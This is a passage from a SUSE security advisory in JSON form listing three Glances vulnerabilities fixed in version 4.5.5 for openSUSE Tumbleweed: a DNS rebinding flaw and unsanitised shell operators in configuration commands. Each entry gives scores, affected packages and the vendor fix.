"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46608"
},
{
"cve": "CVE-2026-46611",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46611"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim\u0027s browser. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46611",
"url": "https://www.suse.com/security/cve/CVE-2026-46611"
},
{
"category": "external",
"summary": "SUSE Bug 1268856 for CVE-2026-46611",
"url": "https://bugzilla.suse.com/1268856"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-46611"
},
{
"cve": "CVE-2026-53925",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-53925"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. From 4.0.8 until 4.5.5, the secure_popen() function in glances/secure.py interprets \u003e (file redirection), | (pipe), and \u0026\u0026 (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via \u003e), chain arbitrary commands (via \u0026\u0026), or pipe command output to arbitrary programs (via |). Write access to glances.conf is therefore equivalent to code execution as the account running Glances; operators should keep the file writable only by root or that account, and audit any configuration-management path that lets a less-privileged user edit it. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-53925",
"url": "https://www.suse.com/security/cve/CVE-2026-53925"
},
{
"category": "external",
"summary": "SUSE Bug 1268984 for CVE-2026-53925",
"url": "https://bugzilla.suse.com/1268984"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-53925"
}
]
}